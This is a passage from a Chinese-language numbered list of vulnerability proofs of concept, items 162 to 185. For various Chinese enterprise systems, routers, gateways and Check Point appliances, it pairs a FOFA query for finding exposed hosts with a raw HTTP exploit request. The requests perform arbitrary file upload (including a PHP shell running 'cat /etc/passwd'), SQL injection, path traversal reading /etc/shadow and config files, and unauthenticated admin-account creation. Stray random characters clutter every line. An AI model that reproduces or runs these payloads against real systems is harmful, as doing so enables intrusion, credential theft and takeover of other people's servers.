" I4 U! n2 {0 m: u<soap:Body>0 @6 s# w( _* C: P; b( q5 |
<UploadResume xmlns="http://tempuri.org/">; q H3 i2 E4 i+ F
<ip>1</ip>
+ p5 T$ y; ^) k' v2 n0 P# s<fileName>../../../../dizxdell.aspx</fileName>
! v" p9 H% n% ?: J<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>0 b2 J8 H% V/ z L9 l. Q. K7 v. r
<tag>3</tag>6 ?3 U1 e. G4 h& y( b# f: D
</UploadResume>
/ M7 @8 D, D( `</soap:Body>
4 X! b) ]- I7 X$ D</soap:Envelope>
3 c5 o) t* u/ Z2 }9 n% A1 b/ E& q
% F* v" l9 p% K- R! S
4 k2 Q4 E. I' r, X8 khttp://x.x.x.x/dizxdell.aspx
" O% p$ r7 N" j; w& _3 g1 q: B# n1 P; t
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
$ J0 _' E$ ?# p0 {) R; Q# F6 ?FOFA: app="和丰山海-数字标牌": I9 m% h9 z7 s# Z, \- W6 r
POST /QH.aspx HTTP/1.1; h* U8 n0 Z8 d4 M- \3 N* g6 f
Host: x.x.x.x8 B- s: z8 T+ h3 x0 h: K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
6 Q) `5 d1 t; ]2 V0 vConnection: close/ r) }$ D0 H- X& ~' p M2 U. s Y
Content-Length: 583
; u( P. m- i; ?( T, qContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
1 \; D, w9 d0 r- A$ S# N( K4 fAccept-Encoding: gzip( N5 I/ ]) D& R" |7 y6 S6 r- [
4 I6 j n6 g' d6 i------WebKitFormBoundaryeegvclmyurlotuey4 e! ^. r( c# f4 U6 ^
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"- K, x" d5 ?2 t W6 @
Content-Type: application/octet-stream
/ q8 ]5 i8 M! [) y2 O! s
3 [# X! N9 N7 e8 i0 i$ U$ p) E<% response.write("ujidwqfuuqjalgkvrpqy") %>$ X3 u. b6 j+ i! V
------WebKitFormBoundaryeegvclmyurlotuey! }4 D6 d8 b4 U( i2 y
Content-Disposition: form-data; name="action"0 [/ ?; S9 t7 m C: E8 D+ ~
! l: q. Z3 @, e$ Tupload, {: k" {. @. j9 B+ h3 b$ [
------WebKitFormBoundaryeegvclmyurlotuey
4 m. m0 i# ^/ b D4 v: FContent-Disposition: form-data; name="responderId"
6 v2 }$ O! R( R7 m6 s
* e% C: m/ M( H+ s( V& j Z5 ]ResourceNewResponder/ h5 J4 q# y7 D( [# m7 w
------WebKitFormBoundaryeegvclmyurlotuey
$ z! p* e6 o7 j8 \3 N3 t( JContent-Disposition: form-data; name="remotePath"
& d: t4 j$ Q, y4 m7 `- G2 Q* P; \8 R5 x3 b4 ^1 m
/opt/resources
! o$ C9 P4 {' p$ p8 B------WebKitFormBoundaryeegvclmyurlotuey--$ H: f! K3 }" O4 s+ L- p
8 \8 L. F8 W U& a; e
' I; x& Q- y$ }9 E4 ~, {http://x.x.x.x/opt/resources/kjuhitjgk.aspx
( `. M/ s2 `0 `$ S- h& ~+ C# b. g. P+ g
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传) P9 x; r( S- e" P8 E1 ^; \
FOFA: icon_hash="-795291075"
2 Z+ d# b$ E, g/ m/ m4 H* CPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.15 d5 g/ h+ b V5 Y1 f( o9 U; l- W# T
Host: x.x.x.x: z) j8 ~( y2 Q8 j; ]" v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
+ ?) F4 t" w9 G9 m- `. u8 Y/ W, [Connection: close3 q" D7 s- D1 a6 Y W; f" q7 ~* K
Content-Length: 293/ X( `& J# ~0 u; h) G! j: x$ o
Accept: */*7 d9 n, J* r U6 v; ]
Accept-Encoding: gzip, deflate
/ S% I: N: k2 t/ U! E! ?Accept-Language: zh-CN,zh;q=0.9
' k$ O+ d0 L2 o- Z* lContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
1 L1 D% }: ^0 j4 W- |
) A b% ?" f$ P# x------iiqvnofupvhdyrcoqyuujyetjvqgocod8 @: T" S+ Y; i/ }. I8 D2 C
Content-Disposition: form-data; name="name"
?4 q; M! v+ } t$ W5 z
* r) S3 F$ c2 k1.php+ P9 o2 o1 G/ k1 r, x1 W
------iiqvnofupvhdyrcoqyuujyetjvqgocod p% I$ }; h: u% b/ x4 n1 B5 w0 j
Content-Disposition: form-data; name="upfile"; filename="1.php"
1 F0 L$ t, [. z t! bContent-Type: image/jpeg- R2 d2 |! w7 K0 _* t/ V
6 T& A7 z Y! W/ b$ n& I7 W/ b1 |rvjhvbhwwuooyiioxega
5 s0 s$ g z* x3 ]: x$ g; i------iiqvnofupvhdyrcoqyuujyetjvqgocod--9 A" |: A7 h" f6 E
2 X. d+ X" M0 Z# J9 k: `( U, |
/ O, N5 a* u9 z$ ]8 L% [9 d
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传$ J9 |0 m# x, ?
FOFA: title="智慧综合管理平台登入"& j; d0 Y2 W8 n3 b9 Z
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
# S2 L. L1 Z% JHost: x.x.x.x" I$ [* O/ g& o8 H; ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
; T! s- i* t0 \4 p* PContent-Length: 288
' O$ t! j! l& F" B; l" sAccept: application/json, text/javascript, */*; q=0.01
+ H/ k+ W. I- ]1 I9 n8 ~4 e/ tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
, a$ K6 b; r4 z3 i% G0 TConnection: close2 o. k8 u9 a5 h) N4 S# u e
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
/ y) N/ g+ S* L. v- M! WX-Requested-With: XMLHttpRequest. h( A: M$ C# \( m$ b! C) d% {
Accept-Encoding: gzip
. ]& l4 _# d* H X; u/ |# I
% y) y6 i" O: j" x' i; J. d c------dqdaieopnozbkapjacdbdthlvtlyl9 K0 l9 k' a( y! `( O3 d- L( H
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx". y* r1 b1 `1 a& L7 j* \5 _7 |8 d
Content-Type: image/jpeg1 h& A+ a" S. c2 p
8 e' G" N+ \3 @* O
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
# l4 f2 { G8 Y6 G$ f------dqdaieopnozbkapjacdbdthlvtlyl--( W& ], u$ n& i( `
" e. s6 r; X' D G. w
! x& d' [# a* s X. b. S4 l5 t* @http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
2 k" B7 p0 S8 I; i" d6 i
0 Z) U' N! m; l; w" }1 k165. OrangeHRM 3.3.3 SQL 注入+ a3 M+ Y) I% g! C) _$ t R" I
CVE-2024-36428
, [+ g* Y# U% J$ pFOFA: app="OrangeHRM-产品"5 p! b- w, g; b% v
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
* X- o( H0 Y5 i, V9 I, g0 u, v
! P; C1 D% ]/ S* w
& t" `) H7 Q* v0 b' c/ M166. 中成科信票务管理平台SeatMapHandler SQL注入/ o: q O$ s i1 L0 \. _
FOFA:body="技术支持:北京中成科信科技发展有限公司"2 ?! ^( j6 B- o6 `9 y
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Z2 ^% n" [1 a6 {& oHost:
3 A$ D$ d* b6 ^) gPragma: no-cache
a+ F! {- f. BCache-Control: no-cache
. h. z. x W, a& x% y$ nUpgrade-Insecure-Requests: 1
+ i+ W- I* Q+ |) z7 ^6 ~6 u2 fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.366 c) ^0 r+ V( c5 t- W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 i2 N9 H$ M) s2 h0 WAccept-Encoding: gzip, deflate1 R5 H7 W% l) C! N2 h8 c& i
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
W3 H! Z$ c# R; j k# @6 U, rCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE2 L6 D, F$ ]2 j4 w2 p) w
Connection: close2 z2 @, h3 n" O( m& z0 r
Content-Type: application/x-www-form-urlencoded
5 Z* q: |7 a+ `# c) G- b' rContent-Length: 89
% w9 |4 s6 q3 ]1 S# g5 @7 C
1 h/ ~0 S, b- o$ f/ y* l" yMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE$ h# }% B+ _! Q
7 e S9 ]% W0 f( G
8 b. C2 K X b r167. 精益价值管理系统 DownLoad.aspx任意文件读取
' v2 p, x1 g" R% ^( _5 B& X* y9 FFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
! b; C% q- O# G8 R# U" yGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.18 _' U: R, G7 T/ {! ~" H- H
Host:
' }, |$ {, I& A" a/ }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) T; D1 e5 L( ^; C7 J
Content-Type: application/x-www-form-urlencoded
8 h& z. K+ C* L# EAccept-Encoding: gzip, deflate' ^' U7 k7 S( [+ f7 X# }
Accept: */*7 F( w: X7 {# s Q6 v
Connection: keep-alive
" d; N5 N+ B7 [7 D6 m R6 n# D8 k& C1 r- B
& _5 h, X$ Y# l# W5 B& \" V
168. 宏景EHR OutputCode 任意文件读取
- w* k) o0 [% H: E& Z" AFOFA:app="HJSOFT-HCM"
1 }, w# M) D# H% L1 X# M7 ]GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.12 p( q! Q. B+ G9 N; i+ Y0 W
Host: your-ip0 |% J2 H; P/ k8 O4 C9 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.367 @( x [. s' F- M; a7 a" y
Content-Type: application/x-www-form-urlencoded
1 n" N! ]/ w( p4 s' \Connection: close- X& T/ n# T/ g+ i$ X9 B- L
& ~$ r: @. \, v% |+ I; w1 q& H/ D9 ] o( z( ~
. z" Z$ \/ t! `1 J7 n169. 宏景EHR downlawbase SQL注入 G! P( P( Z" D8 V' V
FOFA:app="HJSOFT-HCM"
% @0 B! d7 ^7 p5 {; W7 jGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
' i0 F# | ]1 C- s& f( u) @2 w- |Host: your-ip: f; o+ C" E; F/ a$ D! h) o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ c$ Y/ p0 H0 o
Accept: */*
9 E: C3 ~8 r1 k9 | ?* A3 oAccept-Encoding: gzip, deflate
1 P0 j# I& W% B [' C0 R/ @8 ]Connection: close
6 S' p6 m1 t! B7 M4 R
- V# G4 ?' R4 U: Q
% S% d3 V) ]# r8 o1 \ u9 ^4 y9 e4 v5 _
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
4 z1 S% d Z K9 Y7 g7 L5 f6 BFOFA:body="/general/sys/hjaxmanage.js"$ D" D9 G( N1 q
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
& ~9 {' }! M) z- b' A, uHost: balalanengliang
# z) m( t4 S# RUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: M& P5 S2 O1 W+ [Content-Type: application/x-www-form-urlencoded
6 P9 T7 P; e: \
. q C( D# b" S0 Bfilename=../webapps/ROOT/WEB-INF/web.xml
- `8 J0 R2 S+ `: G O& b" J( g9 i; V
' E/ `4 n1 d2 u6 b4 c171. 通天星CMSV6车载定位监控平台 SQL注入
0 d& k+ d5 \! k& E( l. V" X# AFOFA:body="/808gps/"
/ M" @+ \0 |& O* aGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.11 w0 X: P, I; B. ^- K D6 x8 I; U
Host: your-ip0 V% _- _' m( i8 v) Q% b' Q. C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0, V8 Z3 K6 F* m" C+ L
Accept: */*" D1 P7 J( q- s$ A9 r( S" e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 M b2 n" w5 O+ o/ _* Q* E
Accept-Encoding: gzip, deflate
# d+ [, {, A- M8 r+ L7 vConnection: close" Z: D6 G- M2 w$ f$ M8 V
0 N& r7 T8 z; j0 W& {+ E0 W
$ c3 o& q1 x/ _4 D
( F ` e' G3 {1 v172. DT-高清车牌识别摄像机任意文件读取1 ^( @, I8 R! `
FOFA:app="DT-高清车牌识别摄像机"/ M4 Q3 P6 l1 V4 g) Z+ \
GET /../../../../etc/passwd HTTP/1.1. U. \6 {/ [3 Y( I6 I
Host: your-ip
7 g: `( Z( Q& yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
p3 [' M( t6 \) rAccept-Encoding: gzip, deflate9 T& o; t2 V- e! j
Accept: */*
; ^, L) ^# m7 c. \1 m V- q. tConnection: keep-alive
# R' M# J4 V3 A1 q) x% W0 V0 u/ o
k+ G) M- F5 H* f$ v7 c
7 _9 c3 K3 n' T0 d6 [2 u
173. Check Point 安全网关任意文件读取
! L! q% k. Q* T, O0 cCVE-2024-24919
2 l+ `' w# m- E/ E1 V4 cFOFA:app="Check_Point-SSL-Network-Extender"
6 \! u$ \" W2 h1 ~! s8 i) RPOST /clients/MyCRL HTTP/1.1+ q5 [$ Q$ @' s, h& S) {1 F2 c
Host: your-ip- ?* @3 ?" s) K3 Y
Content-Type: application/x-www-form-urlencoded% T6 j7 T, Z* m: j" M k
" H6 Q) R9 u6 S4 o* YaCSHELL/../../../../../../../etc/shadow
+ p' H( ]3 ^& m1 ^! x% v- B+ B* `+ V$ o. u3 d
& ?0 Z, R; n8 l; K5 t
1 L3 t- N( t1 \0 R+ j: a+ n
174. 金和OA C6 FileDownLoad.aspx 任意文件读取% g2 ~. P. {: L, p4 u0 L( u
FOFA:app="金和网络-金和OA"5 e- M+ d+ r4 ]
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1$ L9 T0 c# p% H: `* A4 z$ E
Host: your-ip- \& W: a/ I- K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
' Q! d; s. A: K4 s* AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 s- W$ n! Z. `! Y2 F# J3 K2 y* Q" \Accept-Encoding: gzip, deflate, br0 {& b _3 p. D) i, F/ |
Accept-Language: zh-CN,zh;q=0.9
+ q0 u" d! l" t; }Connection: close
* q6 D5 a8 d1 b* w- `
+ j0 N7 X9 K4 \3 @$ @' b# i& ]. l" t$ h
_- R2 R; B9 x2 X
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
, G' Q5 p# J2 |: p( P1 d6 EFOFA:app="金和网络-金和OA"
, {+ ~1 d6 N' |, `5 k T2 J! YGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
5 C, |9 L( [* Q- y4 l* M* P4 PHost:6 z" S' n- R( B! \/ w. O( K. L" I; B& F
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
0 C1 J9 r5 ^1 {; O. b, L* y; yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 a; l o$ l* G! ~8 ^) [" k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 p' e- n0 b: w% a* H) t) f' |Accept-Encoding: gzip, deflate
5 H0 O5 n9 [. H1 N& z, C, t. ZConnection: close0 X$ n3 G7 h+ _
Upgrade-Insecure-Requests: 1
+ J+ O$ d- `+ @( @1 a( {# l { u7 g6 I4 T" H& M$ h
9 t2 p. G( ]! l, h) \! Y" _
176. 电信网关配置管理系统 rewrite.php 文件上传" M# o' n2 u/ t( e. P
FOFA:body="img/login_bg3.png" && body="系统登录"$ m9 F3 S2 J) R( K- g j0 S
POST /manager/teletext/material/rewrite.php HTTP/1.1" n5 A( r1 L- B# g, y
Host: your-ip4 n: q( u i! F' I! B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0- J* a( q( F0 j2 W% L
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
! O( g% y2 O: e6 p3 wConnection: close
2 K3 h6 X# U% C8 V7 s& ~5 u/ n: `/ w. o" y2 \
------WebKitFormBoundaryOKldnDPT o& ^: {! m) M- H' q8 n: M, Q
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
9 R3 p8 ]; L+ @4 m* ^& t6 \Content-Type: image/png$ x) l0 q+ b, l4 x, X6 t* m
" d; v5 `) L0 \4 B9 m8 l% Q I
<?php system("cat /etc/passwd");unlink(__FILE__);?>* Q9 c( |; ], Z0 j
------WebKitFormBoundaryOKldnDPT
1 n/ p V9 A! [% p# i9 y7 fContent-Disposition: form-data; name="uploadtime") Q1 _; E- k$ \) P; p' D: M
) |7 k- @* c1 | F& L+ ` 0 m) N& P7 {; o6 s5 S8 k
------WebKitFormBoundaryOKldnDPT--) x5 u4 I) b; N; `1 j
# S6 W) s/ I6 _1 l4 H @9 t
" S: v( P4 m G' f
1 A. r6 h3 N+ Q4 X; X3 `177. H3C路由器敏感信息泄露# `7 ]9 N& S$ S- {3 T
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
" S% x2 C% o( O% ~; i( B$ g/userLogin.asp/../actionpolicy_status/../M60.cfg
; F) Y; B! `" W5 a8 E3 A( w/userLogin.asp/../actionpolicy_status/../GR8300.cfg
" j- @, T7 O0 Q) N3 x1 w/ _, ?/userLogin.asp/../actionpolicy_status/../GR5200.cfg
: d M: p( Y8 q$ ~/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/ b* i0 f5 q% [2 b* N2 N) }7 s/userLogin.asp/../actionpolicy_status/../GR2200.cfg5 b1 T7 Y* R1 ^$ A# x5 z
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg7 L" V. ]# k8 k* v2 K; q0 y' g
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
I- H4 m* s8 v" r+ A% G/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
3 j! [" h/ F, g: p$ D1 j, O/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
3 V% A* g8 C4 e8 L- y/userLogin.asp/../actionpolicy_status/../ER5200.cfg3 U$ j4 c# R p
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
1 T5 E; M7 w. `* S9 @ l6 W2 O( t/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
( }6 M6 ~# J; Z9 ]8 N3 \3 t; v/userLogin.asp/../actionpolicy_status/../ER3260.cfg: c, x9 L; x& k, E) J& }
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg) A* e4 n) k- |2 j
/userLogin.asp/../actionpolicy_status/../ER3200.cfg7 B! J$ m1 H' O$ j
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg3 a$ c& r: b; H- I% u
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg6 \1 g( q, f8 {& J( j
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg; V: X f) \7 B% D1 n2 w
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
" s$ Y# k4 h3 w: n; N$ C9 S/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg$ v. `6 O6 M& a: u* p( T
3 M( P. R* b1 Z% p- P# u% k
. ~; V0 D+ I' m+ o4 Y178. H3C校园网自助服务系统-flexfileupload-任意文件上传
& ^ N! l0 v2 _0 B2 n) \* a' }' e) [- CFOFA:header="/selfservice"( T7 b( ~2 w* y1 n' ~! m: {
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.18 V4 _" i: a2 |3 i1 [4 X
Host:" u# ^. u7 Y, [; R4 ^* u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
6 Q1 i I. c$ ~' K8 r% \9 LContent-Length: 2520 D/ \8 ?" q6 e5 a. Z
Accept-Encoding: gzip, deflate
' v1 D% I. }. uConnection: close; o) g( d9 V- v: K0 V% K g
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l" L- @9 q* I5 B+ ?: v/ a; p
-----------------aqutkea7vvanpqy3rh2l0 [; v3 l3 x d4 @9 c
Content-Disposition: form-data; name="12234.txt"; filename="12234"
, ]* A; S5 p$ |; P- W/ xContent-Type: application/octet-stream
$ c: y$ ?* e! {. m3 g& r( hContent-Length: 255- W3 L7 |- |# S
/ q, e, u8 ]! g3 a8 L
12234
^# F+ d" ]! v5 [% c: R" _3 b' H-----------------aqutkea7vvanpqy3rh2l--
2 d& n% I7 G( D3 i: ]% `4 M
. ^1 Q) `& ^8 \6 w# D2 G; p+ ~! X8 i7 V' P4 L2 V7 p
GET /imc/primepush/%2e%2e/flex/12234.txt
+ }5 i; g7 N" {7 l/ x+ e, o) q9 j! a% n/ a8 T& X
9 i: X P. k, e7 I; [: h179. 建文工程管理系统存在任意文件读取/ U! D6 x- g) y, I P+ Z
POST /Common/DownLoad2.aspx HTTP/1.1
; {: c c; _. @9 F0 @$ EHost: {{Hostname}}" D9 _0 h/ J0 h e) ]0 N1 O7 u6 M4 h% c
Content-Type: application/x-www-form-urlencoded9 V" h0 I+ ~; c9 b
User-Agent: Mozilla/5.0
) R y+ ?3 m8 m+ P, d: O
7 D$ F1 A* c' g- P/ Vpath=../log4net.config&Name=
( Y# k6 z6 ?0 E* D
0 Q& t/ e j, u- K! ?3 H( ^. F' M+ M, C8 F
180. 帮管客 CRM jiliyu SQL注入
8 J+ n% p, R1 O, \/ FFOFA:app="帮管客-CRM"" f; [! o* y" P% [' _
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
4 {. {# Y& Q# u3 w4 [! B: ~3 fHost: your-ip% r( d7 ?* e/ @0 N. P+ X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36, o* K! Q% t& x) |- w$ c) y1 ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* z2 k' S- e1 U5 D Y7 q! U1 Y
Accept-Encoding: gzip, deflate6 I3 Q$ h% n# ~2 V2 f4 L6 ~
Accept-Language: zh-CN,zh;q=0.9
1 W! ?, U5 p) u' E2 ]! h) v) H! HConnection: close9 r X2 @& C% z
; M' Z0 X, N+ {, J6 d
% E6 W, |& b% A! B181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入: W3 {' l6 R/ f) D
FOFA:"PDCA/js/_publicCom.js". y1 v& [: q! e+ d& n1 g/ J
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
0 T. q* e2 z; J0 v8 dHost: your-ip
/ v, }& ~0 n! H- F: S) E! o6 PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" g+ P3 u. l8 _" S- D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" v+ R* O9 D; M9 ~5 v: @, @! N
Accept-Encoding: gzip, deflate, br! ?$ _( K! J- p4 x
Accept-Language: zh-CN,zh;q=0.94 Y' X+ R6 @; `9 R
Connection: close& Z" T: ?" I0 N
Content-Type: application/x-www-form-urlencoded
! P4 b! p6 s$ J" ?, N1 X: \6 i8 M9 d
" o# |" n u# j. t
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=207 r7 z7 W/ R, A, l' B' o
3 L. h0 Q$ h9 r) ^
$ u0 v ]' q/ j7 Q182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
: X4 O" D- b0 B, aFOFA:"PDCA/js/_publicCom.js"
6 p) C8 Y7 n* l% t: B5 p7 tPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.13 l7 X8 f( V) B) s" z
Host: your-ip
. ^" b' Q3 p8 }+ {5 Q4 K4 Y' B5 N+ iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.367 \. q. i: i' U0 ?4 [- i0 W! b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: W7 U! ^" z. v+ h L" nAccept-Encoding: gzip, deflate, br
# H% J2 X" l, s8 j" p& GAccept-Language: zh-CN,zh;q=0.9
7 d; R$ Q1 g1 VConnection: close- o" S+ M0 \# \) f+ ~
Content-Type: application/x-www-form-urlencoded
# V6 \1 |0 e; M2 o+ e3 [' \4 |0 C. n1 @; `( e$ h2 z3 q
% c; _" h( ^" W
username=test1234&pwd=test1234&savedays=1
5 [/ k- V4 Q# W/ N* J4 w/ y& ]- v& Y6 m/ w& K; ~# E; ^: ~
" ~8 v6 V) [) s8 q% `7 R
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
& n0 B1 ^. X) g. pFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"% N/ G- A& I2 `% L+ N
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
7 f/ N( c2 u* U' h u3 h* fHost: your-ip
# S, L$ u5 ^! W" hUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.366 p @# y6 p# a" ^9 ]6 K
Accept-Charset: utf-8
) Z" h: M( W2 l: X; |Accept-Encoding: gzip, deflate* V, Q) y+ {1 H; E) C- f# H. A
Connection: close
0 h4 Z* C. G Y, z- s
+ X. q6 b7 ~% \1 h0 H. q9 p! y2 N0 Q% a o
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
, P+ S- [9 n: R7 B* a9 mFOFA:server="SunFull-Webs"
/ B% v, n$ |/ p" e. E8 c. QPOST /soap/AddUser HTTP/1.1
, d% R8 f+ \' VHost: your-ip
- f- L3 c- X) w6 HAccept-Encoding: gzip, deflate. Q/ g; L/ d9 g9 I, O1 [( u% m$ n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
% Q. u. T3 }: |' o2 z& kAccept: application/xml, text/xml, */*; q=0.01
! n7 e) V+ b9 H d7 O$ gContent-Type: text/xml; charset=utf-8
2 O! f2 L! w3 k+ ^! Q% uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% y0 a* b4 Z) ?, Z5 z1 Q
X-Requested-With: XMLHttpRequest
' |, ~: `) P1 s# ^* j! V# O
! W# r: g4 K7 T
/ g1 G% m; j3 C$ U& c1 \! c) Vinsert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
! Q, ` `/ D% m
* B, z2 Q' T4 n9 N7 k9 I
6 V O+ l2 D% P. v5 b" H185. 瑞友天翼应用虚拟化系统SQL注入
